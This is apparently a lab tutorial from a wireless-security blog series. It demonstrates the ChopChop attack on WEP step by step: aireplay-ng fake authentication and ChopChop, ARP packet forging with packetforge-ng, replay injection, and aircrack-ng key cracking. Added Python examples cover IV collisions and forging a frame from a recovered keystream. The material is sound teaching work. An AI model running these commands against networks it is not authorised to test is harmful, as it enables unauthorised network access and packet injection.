It’s time to look at another WEP attack, this time Korek’s ChopChop. It will sometimes look like it is working against an access point and then fail, because the access point is not actually vulnerable: it drops packets shorter than 60 bytes. If the access point only drops packets shorter than 42 bytes, aireplay-ng will try to guess the rest of the missing data, as the headers are predictable. WEP uses a short 24-bit IV (an initialization vector, or nonce), which means IVs are reused under the same key.
This attack is a related-key attack: we can observe the operation of the cipher under several different parameters whose values are initially unknown, but, according to the theory behind ChopChop, there is a mathematical relationship connecting the keys.
WEP is famous for using RC4, a stream cipher, and that choice is the cause of its downfall. As you may be aware, security advocates have been calling for RC4 to be removed from anything that still uses it, such as SSL, as it is well and truly broken. Because of the birthday attack (the birthday paradox), it is likely that in every 4096 packets two will share the same IV, and therefore the same RC4 key, which means those packets can be attacked.
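To put a number on the birthday-paradox claim above, here is an added example (not code from the original post) that computes the exact probability of an IV collision for a given number of packets in WEP’s 24-bit IV space, finds the packet count at which a repeat becomes more likely than not, and simulates random IV selection to count actual reuse. Every value is computed locally; the seed and packet counts are constructed for the demonstration.

```python
"""Birthday-bound arithmetic for WEP's 24-bit IV space (added example)."""
import math
import random

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IVs per key


def collision_probability(packets: int, space: int = IV_SPACE) -> float:
    """Exact probability that at least two of `packets` uniformly random IVs
    coincide: 1 - prod_{i=0}^{n-1} (1 - i/space), accumulated in log space
    so the product does not underflow for large n."""
    log_no_collision = 0.0
    for i in range(packets):
        log_no_collision += math.log1p(-i / space)
    return 1.0 - math.exp(log_no_collision)


def packets_for_probability(target: float, space: int = IV_SPACE) -> int:
    """Smallest packet count at which the collision probability reaches
    `target`, found by walking the exact product term by term."""
    log_no_collision = 0.0
    n = 0
    while 1.0 - math.exp(log_no_collision) < target:
        log_no_collision += math.log1p(-n / space)
        n += 1
    return n


def simulate_reuse(packets: int, seed: int = 1) -> int:
    """Draw `packets` IVs uniformly at random (one IV-selection strategy WEP
    drivers used) and return how many packets reuse an IV already seen.
    The seed is constructed so the run is reproducible."""
    rng = random.Random(seed)
    seen = set()
    reused = 0
    for _ in range(packets):
        iv = rng.getrandbits(IV_BITS)
        if iv in seen:
            reused += 1
        seen.add(iv)
    return reused


if __name__ == "__main__":
    for n in (1000, 4096, 10000, 50000):
        print(f"{n:>6} packets: P(some IV reused) = {collision_probability(n):.3f}")
    print("packets for a 50% chance of reuse:", packets_for_probability(0.5))
    print("IV reuses in 100000 simulated packets:", simulate_reuse(100000))
```

The 4096 figure in the text is the square root of the IV space; at exactly 4096 packets the collision probability is just under 40%, and it passes 50% a few hundred packets later. On a busy network that is a matter of seconds, which is why the IV size alone, before any RC4 weakness, makes WEP unsafe.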
The aim of the ChopChop attack, like the fragmentation attack, is to obtain the PRGA (pseudo-random generation algorithm) keystream file. It cannot be used to decrypt packets, as it is not the WEP key, but we can use it to create new packets with packetforge-ng for injection.
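The following added example (not code from the original post or from the aircrack-ng project) shows in miniature why a recovered keystream is enough to forge a frame. It implements RC4 from its public description and WEP’s per-packet key construction (IV || secret key) with the CRC-32 ICV, then recovers the keystream for one IV from a frame whose plaintext is known and uses only that keystream to build a new frame that the receiver accepts. The key, IV and frame contents are constructed; the one-byte key-index field that follows the IV on the air is omitted for brevity.

```python
"""Toy WEP: keystream reuse lets a frame be forged without the key (added example)."""
import zlib
from typing import Optional, Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling algorithm followed by PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(secret_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV in the clear || RC4(IV || key) applied to payload || ICV."""
    plaintext = payload + icv(payload)
    return iv + xor_bytes(plaintext, rc4_keystream(iv + secret_key, len(plaintext)))


def wep_decrypt(secret_key: bytes, frame: bytes) -> Optional[bytes]:
    """Return the payload if the ICV verifies, else None (the frame is dropped)."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor_bytes(body, rc4_keystream(iv + secret_key, len(body)))
    payload, tag = plaintext[:-4], plaintext[-4:]
    return payload if icv(payload) == tag else None


def recover_keystream(frame: bytes, known_payload: bytes) -> Tuple[bytes, bytes]:
    """What ChopChop or fragmentation ultimately yield (the .xor file): given a
    frame and its plaintext, XOR exposes the keystream for that IV."""
    iv, body = frame[:3], frame[3:]
    return iv, xor_bytes(body, known_payload + icv(known_payload))


def forge_with_keystream(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Build a valid frame for `payload` using only the recovered keystream,
    as packetforge-ng does; no key is involved. The new payload plus ICV must
    fit within the recovered keystream length."""
    plaintext = payload + icv(payload)
    if len(plaintext) > len(keystream):
        raise ValueError("recovered keystream is too short for this payload")
    return iv + xor_bytes(plaintext, keystream[: len(plaintext)])


def demo() -> bool:
    """Forge a frame from one known-plaintext frame and check the receiver accepts it."""
    secret_key = bytes.fromhex("0123456789")  # constructed 40-bit WEP key
    iv = bytes.fromhex("a1b2c3")              # constructed IV
    original = b"ARP who-has 192.168.1.1 tell 192.168.1.20    "  # constructed payload
    frame = wep_encrypt(secret_key, iv, original)
    iv_out, keystream = recover_keystream(frame, original)
    forged_payload = b"ARP who-has 192.168.1.1 tell 10.0.0.9"
    forged = forge_with_keystream(iv_out, keystream, forged_payload)
    return wep_decrypt(secret_key, forged) == forged_payload


if __name__ == "__main__":
    print("forged frame accepted without the key:", demo())
```

Two points the toy makes concrete: the recovered keystream is tied to one IV (a different IV under the same key gives an unrelated keystream, which is why the .xor file is not the key), and because RC4 is a stream cipher and the ICV is a plain CRC, anyone holding that keystream can produce frames the access point will accept. That is the property packetforge-ng and the injection step below rely on.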
Let’s configure our access point like the following below.

Put your card into monitor mode.

Start airodump-ng listening with the following parameters:
“airodump-ng” to start airodump-ng
“mon0” for your card interface
“-c” for the channel of your access point in this case 1
“–bssid” is followed by the MAC address of the access point
“-w” writes to a file called out

Output looks like the following with one client attached.

Next, run aireplay-ng to do a fake authentication with the access point, using your card’s actual physical MAC address:
aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is for re-association timing in seconds and may need to be adjusted
“-a” is followed by the MAC address of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless card

After the fake authentication, looking at the airodump-ng output again you will see that you are now authenticated.

Now that we have authenticated we can run a ChopChop attack with the following parameters:
aireplay-ng -4 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
“aireplay-ng” to start aireplay-ng
“-4” specifies the Chopchop attack
“-e” specifies the SSID of the access point in this case ‘test’
“-b” specifies the MAC address of the access point
“-h” is used to specify your physical wireless card MAC address
“mon0” is the interface of your wireless card

Once the aireplay-ng ChopChop attack is running you will see the following output; answer ‘yes’ to accept a packet, or ‘no’ to skip it and wait for another packet if the size is too small.

When ChopChop is finished you will see something similar to the following output: you have now obtained a capture file and a xor file from ChopChop processing the packet you selected.

Now you can use packetforge-ng to craft a packet of your choosing, an ARP packet in this case, with the following parameters:
“packetforge-ng” to start packetforge-ng
“-0” is to forge an ARP packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” sets the destination IP and/or port, in this case the broadcast address 255.255.255.255
“-l” (a lower-case ‘L’, to avoid confusion) sets the source IP and/or port, once again the broadcast address 255.255.255.255
“-y” is to use the xor file obtained from the ChopChop attack to forge the packet
“-w” writes the forged packet to a file, called arp-request here

Once you have your packet forged from the previous step you can inject it into the access point with the following aireplay-ng parameters:
“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” selects the file from which to extract packets, arp-request here
“mon0” is the interface of your card to run this from

Looking at the airodump-ng output now, you will see the Data and frame counts increasing hugely once packets start getting injected, like below.

The next thing to do is run aircrack-ng. Something to note here: when doing this on the Raspberry Pi 2 while the ChopChop attack is running, it seems to freeze injection if you run aircrack-ng at the same time, so it’s best to let it run and capture for a few minutes and then run aircrack-ng like so:
“aircrack-ng” to start aircrack-ng
“out-0*.cap” is the capture file or files to run aircrack-ng against; the asterisk lets you open multiple files at the same time. As I had some issues here with aircrack-ng freezing the injection process, I have a few extra capture files below.
Also take note of the number of IVs obtained below, as this makes the cracking process much easier and faster to carry out.

Success then looks like the following once aircrack-ng has cracked the key.

Lesson learned:
Don’t use WEP. I really cannot stress it enough: if you have been following along with these lessons you will have seen that it is often very trivial to obtain the WEP key, and that there are many different attack vectors which can be used to obtain it. So don’t use WEP, and if you know anyone who is using WEP, show them how to secure themselves with a strong WPA passphrase in order to make it harder to compromise their home or business. The Korek ChopChop attack is very interesting and is a good way to understand how WEP encryption works; it is worth carrying out this attack in your lab in order to understand WEP encryption better and why you should refrain from using it.